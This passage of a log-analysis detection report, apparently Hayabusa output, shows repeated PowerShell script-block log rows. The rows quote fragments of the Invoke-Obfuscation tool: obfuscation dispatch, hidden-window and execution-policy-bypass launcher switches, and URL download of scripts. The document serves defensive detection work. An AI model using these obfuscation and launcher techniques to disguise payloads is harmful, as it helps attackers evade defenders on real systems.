ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' -NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. $Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } 